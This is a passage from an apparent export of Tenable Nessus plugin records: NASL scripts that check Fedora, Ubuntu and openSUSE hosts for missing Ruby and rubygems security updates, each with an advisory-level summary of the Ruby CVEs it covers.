value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3900\");\n script_xref(name:\"FEDORA\", value:\"2015-12574\");\n\n script_name(english:\"Fedora 22 : rubygems-2.4.8-100.fc22 (2015-12574)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to RubyGems 2.4.8.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1236116\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163600.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e9aedd58\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygems package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"rubygems-2.4.8-100.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygems\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:36", "description": "It was discovered that Ruby DL::dlopen incorrectly handled opening libraries. An attacker could possibly use this issue to open libraries with tainted names. This issue only applied to Ubuntu 14.04 LTS.\n(CVE-2009-5147)\n\nTony Arcieri, Jeffrey Walton, and Steffan Ullrich discovered that the Ruby OpenSSL extension incorrectly handled hostname wildcard matching.\nThis issue only applied to Ubuntu 14.04 LTS. (CVE-2015-1855)\n\nChristian Hofstaedtler discovered that Ruby Fiddle::Handle incorrectly handled certain crafted strings. An attacker could use this issue to cause a denial of service, or possibly execute arbitrary code. This issue only applied to Ubuntu 14.04 LTS. (CVE-2015-7551)\n\nIt was discovered that Ruby Net::SMTP incorrectly handled CRLF sequences. A remote attacker could possibly use this issue to inject SMTP commands. (CVE-2015-9096)\n\nMarcin Noga discovered that Ruby incorrectly handled certain arguments in a TclTkIp class method. An attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS.\n(CVE-2016-2337)\n\nIt was discovered that Ruby Fiddle::Function.new incorrectly handled certain arguments. An attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS.\n(CVE-2016-2339)\n\nIt was discovered that Ruby incorrectly handled the initialization vector (IV) in GCM mode. An attacker could possibly use this issue to bypass encryption. (CVE-2016-7798).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-26T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : ruby1.9.1, ruby2.0, ruby2.3 vulnerabilities (USN-3365-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5147", "CVE-2015-1855", "CVE-2015-7551", "CVE-2015-9096", "CVE-2016-2337", "CVE-2016-2339", "CVE-2016-7798"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libruby1.9.1", "p-cpe:/a:canonical:ubuntu_linux:libruby2.0", "p-cpe:/a:canonical:ubuntu_linux:libruby2.3", "p-cpe:/a:canonical:ubuntu_linux:ruby1.9.1", "p-cpe:/a:canonical:ubuntu_linux:ruby2.0", "p-cpe:/a:canonical:ubuntu_linux:ruby2.3", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.04"], "id": "UBUNTU_USN-3365-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101974", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3365-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101974);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2009-5147\", \"CVE-2015-1855\", \"CVE-2015-7551\", \"CVE-2015-9096\", \"CVE-2016-2337\", \"CVE-2016-2339\", \"CVE-2016-7798\");\n script_xref(name:\"USN\", value:\"3365-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : ruby1.9.1, ruby2.0, ruby2.3 vulnerabilities (USN-3365-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that Ruby DL::dlopen incorrectly handled opening\nlibraries. An attacker could possibly use this issue to open libraries\nwith tainted names. This issue only applied to Ubuntu 14.04 LTS.\n(CVE-2009-5147)\n\nTony Arcieri, Jeffrey Walton, and Steffan Ullrich discovered that the\nRuby OpenSSL extension incorrectly handled hostname wildcard matching.\nThis issue only applied to Ubuntu 14.04 LTS. (CVE-2015-1855)\n\nChristian Hofstaedtler discovered that Ruby Fiddle::Handle incorrectly\nhandled certain crafted strings. An attacker could use this issue to\ncause a denial of service, or possibly execute arbitrary code. This\nissue only applied to Ubuntu 14.04 LTS. (CVE-2015-7551)\n\nIt was discovered that Ruby Net::SMTP incorrectly handled CRLF\nsequences. A remote attacker could possibly use this issue to inject\nSMTP commands. (CVE-2015-9096)\n\nMarcin Noga discovered that Ruby incorrectly handled certain arguments\nin a TclTkIp class method. An attacker could possibly use this issue\nto execute arbitrary code. This issue only affected Ubuntu 14.04 LTS.\n(CVE-2016-2337)\n\nIt was discovered that Ruby Fiddle::Function.new incorrectly handled\ncertain arguments. An attacker could possibly use this issue to\nexecute arbitrary code. This issue only affected Ubuntu 14.04 LTS.\n(CVE-2016-2339)\n\nIt was discovered that Ruby incorrectly handled the initialization\nvector (IV) in GCM mode. An attacker could possibly use this issue to\nbypass encryption. (CVE-2016-7798).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3365-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby2.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby2.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby2.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby2.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2023 Canonical, Inc. / NASL script (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libruby1.9.1\", pkgver:\"1.9.3.484-2ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libruby2.0\", pkgver:\"2.0.0.484-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"ruby1.9.1\", pkgver:\"1.9.3.484-2ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"ruby2.0\", pkgver:\"2.0.0.484-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libruby2.3\", pkgver:\"2.3.1-2~16.04.2\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"ruby2.3\", pkgver:\"2.3.1-2~16.04.2\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libruby2.3\", pkgver:\"2.3.3-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"ruby2.3\", pkgver:\"2.3.3-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libruby1.9.1 / libruby2.0 / libruby2.3 / ruby1.9.1 / ruby2.0 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:24", "description": "This update for ruby2.2, ruby2.3 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2016-2339: heap overflow vulnerability in the Fiddle::Function.new'initialize' (boo#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (boo#959495)\n\nDetailed ChangeLog :\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_2_6/ChangeLog\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_3_3/ChangeLog", "cvss3": {}, "published": "2017-04-06T00:00:00", "type": "nessus", "title": "openSUSE Security Update : ruby2.2 / ruby2.3 (openSUSE-2017-435)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7551", "CVE-2016-2339"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libruby2_2-2_2", "p-cpe:/a:novell:opensuse:libruby2_2-2_2-debuginfo", "p-cpe:/a:novell:opensuse:libruby2_3-2_3", "p-cpe:/a:novell:opensuse:libruby2_3-2_3-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.2", "p-cpe:/a:novell:opensuse:ruby2.2-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.2-debugsource", "p-cpe:/a:novell:opensuse:ruby2.2-devel", "p-cpe:/a:novell:opensuse:ruby2.2-devel-extra", "p-cpe:/a:novell:opensuse:ruby2.2-doc-ri", "p-cpe:/a:novell:opensuse:ruby2.2-stdlib", "p-cpe:/a:novell:opensuse:ruby2.2-stdlib-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.2-tk", "p-cpe:/a:novell:opensuse:ruby2.2-tk-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.3", "p-cpe:/a:novell:opensuse:ruby2.3-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.3-debugsource", "p-cpe:/a:novell:opensuse:ruby2.3-devel", "p-cpe:/a:novell:opensuse:ruby2.3-devel-extra", "p-cpe:/a:novell:opensuse:ruby2.3-doc-ri", "p-cpe:/a:novell:opensuse:ruby2.3-stdlib", "p-cpe:/a:novell:opensuse:ruby2.3-stdlib-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.3-tk", "p-cpe:/a:novell:opensuse:ruby2.3-tk-debuginfo", "cpe:/o:novell:opensuse:42.1", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-435.NASL", "href": "https://www.tenable.com/plugins/nessus/99208", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-435.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99208);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-7551\", \"CVE-2016-2339\");\n\n script_name(english:\"openSUSE Security Update : ruby2.2 / ruby2.3 (openSUSE-2017-435)\");\n script_summary(english:\"Check for the openSUSE-2017-435 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ruby2.2, ruby2.3 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new'initialize' (boo#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and\n DL (boo#959495)\n\nDetailed ChangeLog :\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_2_6/ChangeLog\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_3_3/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://svn.ruby-lang.org/repos/ruby/tags/v2_2_6/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://svn.ruby-lang.org/repos/ruby/tags/v2_3_3/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1018808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=959495\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ruby2.2 / ruby2.3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libruby2_2-2_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libruby2_2-2_2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libruby2_3-2_3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libruby2_3-2_3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-devel-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-doc-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-stdlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-stdlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-tk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-devel-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-doc-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-stdlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-stdlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-tk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libruby2_2-2_2-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libruby2_2-2_2-debuginfo-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-debuginfo-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-debugsource-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-devel-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-devel-extra-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-doc-ri-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-stdlib-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-stdlib-debuginfo-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-tk-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.2-tk-debuginfo-2.2.6-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libruby2_2-2_2-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libruby2_2-2_2-debuginfo-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libruby2_3-2_3-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libruby2_3-2_3-debuginfo-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-debuginfo-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-debugsource-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-devel-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-devel-extra-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-doc-ri-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-stdlib-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-stdlib-debuginfo-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-tk-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.2-tk-debuginfo-2.2.6-6.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-debuginfo-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-debugsource-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-devel-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-devel-extra-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-doc-ri-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-stdlib-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-stdlib-debuginfo-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-tk-2.3.3-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.3-tk-debuginfo-2.3.3-2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libruby2_2-2_2 / libruby2_2-2_2-debuginfo / ruby2.2 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-19T12:22:52", "description": "According to the versions of the ruby packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.Security Fix(es):An issue was discovered in the OpenSSL library in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. When two OpenSSL::X509::Name objects are compared using ==, depending on the ordering, non-equal objects may return true. When the first argument is one character longer than the second, or the second argument contains a character that is one less than a character in the same position of the first argument, the result of == will be true. This could be leveraged to create an illegitimate certificate that may be accepted as legitimate and then used in signing or encryption operations.(CVE-2018-16395)An issue was discovered in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. It does not taint strings that result from unpacking tainted strings with some formats.(CVE-2018-16396)** RESERVED\n ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.(CVE-2019-8322)** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem.\n When the candidate has been publicized, the details for this candidate will be provided.(CVE-2019-8323)** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.(CVE-2019-8324)** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.(CVE-2019-8325)An exploitable heap overflow vulnerability exists in the Fiddle::Function.new ''initialize'' function functionality of Ruby. In Fiddle::Function.new ''initialize'' heap buffer ''arg_types'' allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.(CVE-2016-2339)Type confusion exists in\n _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as ''retval'' argument can cause arbitrary code execution.(CVE-2016-2337)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-30T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : ruby 